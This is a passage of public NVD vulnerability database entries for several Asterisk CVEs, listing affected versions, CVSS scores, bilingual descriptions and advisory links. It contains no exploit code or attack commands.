              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "672CE4C0-EBD6-470B-937E-810FF1C4CDBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88DB1105-74D8-4312-9D02-D1E21F2E785C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "404C0557-6229-4D90-BFDD-54AFFCCE6A19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6D1D26CC-891F-4396-B7D7-30D712829E71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B61EA-F4D1-452A-9D96-B8DFDD719B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9324AB96-EC99-4F04-A0A9-00F936C86EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B8B5E76-4A74-4E88-8A6F-C23538B7642A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB6BBCA-47CE-49B8-9706-AFDE4BE46550",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BFF65E2-692B-4C39-88FC-6DED8D9A7258",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5260E309-9320-4DB8-A918-7D215BF95D2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "60AFF340-A866-4CFE-9334-53B95FD4AA59",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "74E50309-CD7D-41F7-97DA-A7E451D0796A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6FD3F8F8-820E-4C29-9F8F-023D1DB999CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "C33A6419-0D00-49D6-9A48-2B633610AAED",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687ED3CE-67C4-410D-8AF4-C769015598F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "30E918CD-89C4-42DA-9709-E50E0A3FA736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "DA57FA15-D0D7-4A97-9C25-6F6566940098",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A1C45300-A2CF-40E7-AB67-23DC24C31A1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "958081DC-1D77-45CD-A940-C7A1AB42C7BA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "298A879D-4F65-4523-A752-D17C4F81B822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "37AB07BE-54C4-4972-A05F-D1E2CF4363CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EBC63564-A84E-463D-8312-DDF1C6B7796F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "62A0906E-B631-4F3A-9ABC-9A43A43220BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C6314ADA-2849-416D-966E-C01C322EF904",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8B6CB1DD-614A-4B3D-99AE-9B1341427024",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC95B04F-3746-4F1C-8428-A1FA10253E14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "20819080-E0AB-4879-B4CF-A154D6F7EF6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6C45753-E2CC-4F7C-B8DA-3D8CF255EA22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5A080197-D6AA-4FDC-888E-51D1C8251E34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "1F08D930-D4C1-4C63-875C-171C46AE97C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AA43D7D-AEAD-47CB-BFA5-B73004A1A7A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "B5ED5F6F-166D-4610-8939-A33AD45F1ADE",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Stack-based buffer overflow in the ast_parse_digest function in main/utils.c in Asterisk 1.8.x before 1.8.10.1 and 10.x before 10.2.1 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long string in an HTTP Digest Authentication header."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de desboramiento de buffer basado en memoria din\u00e1mica en la funci\u00f3n ast_parse_digest en main/utils.c en Asterisk v1.8.x antes de v1.8.10.1 y v10.x antes de v10.2.1, permite a atacantes remotos provocar una denegaci\u00f3n de servicio (ca\u00edda) o posiblemente ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de una cadena larga en una cabecera HTTP Digest Authentication"
    }
  ],
  "id": "CVE-2012-1184",
  "lastModified": "2024-11-21T01:36:36.983",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2012-09-18T18:55:04.270",
  "references": [
    {
      "source": "secalert@redhat.com",
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-003-1.8.diff"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-003.pdf"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://osvdb.org/80126"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/48417"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.asterisk.org/node/51797"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.openwall.com/lists/oss-security/2012/03/16/10"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.openwall.com/lists/oss-security/2012/03/16/17"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.securitytracker.com/id?1026813"
    },
    {
      "source": "secalert@redhat.com",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74083"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-003-1.8.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-003.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/80126"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/48417"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.asterisk.org/node/51797"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.openwall.com/lists/oss-security/2012/03/16/10"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.openwall.com/lists/oss-security/2012/03/16/17"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1026813"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74083"
    }
  ],
  "sourceIdentifier": "secalert@redhat.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2018-02-22 00:29

Modified

2024-11-21 04:11

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

A NULL pointer access issue was discovered in Asterisk 15.x through 15.2.1. The RTP support in Asterisk maintains its own registry of dynamic codecs and desired payload numbers. While an SDP negotiation may result in a codec using a different payload number, these desired ones are still stored internally. When an RTP packet was received, this registry would be consulted if the payload number was not found in the negotiated SDP. This registry was incorrectly consulted for all packets, even those which are dynamic. If the payload number resulted in a codec of a different type than the RTP stream (for example, the payload number resulted in a video codec but the stream carried audio), a crash could occur if no stream of that type had been negotiated. This was due to the code incorrectly assuming that a stream of that type would always exist.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2018-001.html	Patch, Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/103149	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id/1040415	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2018-001.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/103149	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1040415	Third Party Advisory, VDB Entry

Impacted products

	Vendor	Product	Version
	digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D63485A9-4464-49C7-ACF8-826303D8C152",
              "versionEndIncluding": "15.2.1",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A NULL pointer access issue was discovered in Asterisk 15.x through 15.2.1. The RTP support in Asterisk maintains its own registry of dynamic codecs and desired payload numbers. While an SDP negotiation may result in a codec using a different payload number, these desired ones are still stored internally. When an RTP packet was received, this registry would be consulted if the payload number was not found in the negotiated SDP. This registry was incorrectly consulted for all packets, even those which are dynamic. If the payload number resulted in a codec of a different type than the RTP stream (for example, the payload number resulted in a video codec but the stream carried audio), a crash could occur if no stream of that type had been negotiated. This was due to the code incorrectly assuming that a stream of that type would always exist."
    },
    {
      "lang": "es",
      "value": "Se ha descubierto un problema de acceso a puntero NULL en las versiones 15.x de Asterisk hasta la versi\u00f3n 15.2.1. El soporte RTP en Asterisk mantiene su propio registro de c\u00f3decs din\u00e1micos y n\u00fameros de carga \u00fatil deseados. Aunque una negociaci\u00f3n SDP puede resultar en que un c\u00f3dec emplee un n\u00famero de carga \u00fatil diferente, aquellos que se deseen se siguen almacenando internamente. Cuando se recib\u00eda un paquete RTP, este registro ser\u00eda consultado si el n\u00famero de carga \u00fatil no se encontraba en el SDP negociado. Este registro se consultaba err\u00f3neamente para todos los paquetes, incluso los din\u00e1micos. Si el n\u00famero de carga \u00fatil resultaba en un c\u00f3dec con tipo diferente a la transmisi\u00f3n RTP (por ejemplo, el n\u00famero de payload resultaba en un c\u00f3dec de v\u00eddeo, pero la transmisi\u00f3n conten\u00eda audio), podr\u00eda ocurrir un cierre inesperado si no se hab\u00eda negociado una transmisi\u00f3n de ese tipo. Esto se debe a que el c\u00f3digo asume err\u00f3neamente que una transmisi\u00f3n de este tipo existir\u00eda siempre."
    }
  ],
  "id": "CVE-2018-7285",
  "lastModified": "2024-11-21T04:11:56.460",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": true,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-02-22T00:29:01.063",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2018-001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/103149"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040415"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2018-001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/103149"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040415"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-476"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2013-01-04 11:52

Modified

2024-11-21 01:45

Severity ?

Summary

Multiple stack consumption vulnerabilities in Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones allow remote attackers to cause a denial of service (daemon crash) via TCP data using the (1) SIP, (2) HTTP, or (3) XMPP protocol.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2012-014	Vendor Advisory
cve@mitre.org	http://www.debian.org/security/2013/dsa-2605
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2012-014	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2013/dsa-2605

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.1
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.1
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.12
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.1
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.1
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.1
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.1
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.1
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.1
digium	asterisk	10.1.2
digium	asterisk	10.1.3
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.1
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.1
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.1
digium	asterisk	10.4.2
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.1
digium	asterisk	10.5.2
digium	asterisk	10.6.0
digium	asterisk	10.6.0
digium	asterisk	10.6.0
digium	asterisk	10.6.0
digium	asterisk	10.6.1
digium	asterisk	10.6.1
digium	asterisk	10.7.0
digium	asterisk	10.7.0
digium	asterisk	10.7.0
digium	asterisk	10.7.1
digium	asterisk	10.8.0
digium	asterisk	10.8.0
digium	asterisk	10.8.0
digium	asterisk	10.9.0
digium	asterisk	10.9.0
digium	asterisk	10.9.0
digium	asterisk	10.9.0
digium	asterisk	10.10.0
digium	asterisk	10.10.0
digium	asterisk	10.10.0
digium	asterisk	10.10.1
digium	asterisk	10.11.0
digium	asterisk	10.11.0
digium	asterisk	10.11.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.1
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.1
digium	asterisk	10.5.2
digium	asterisk	10.6.0
digium	asterisk	10.6.1
digium	asterisk	10.7.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AEE324AC-5231-43DB-B077-EA1E0145FF5B",
              "versionEndIncluding": "1.8.19.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
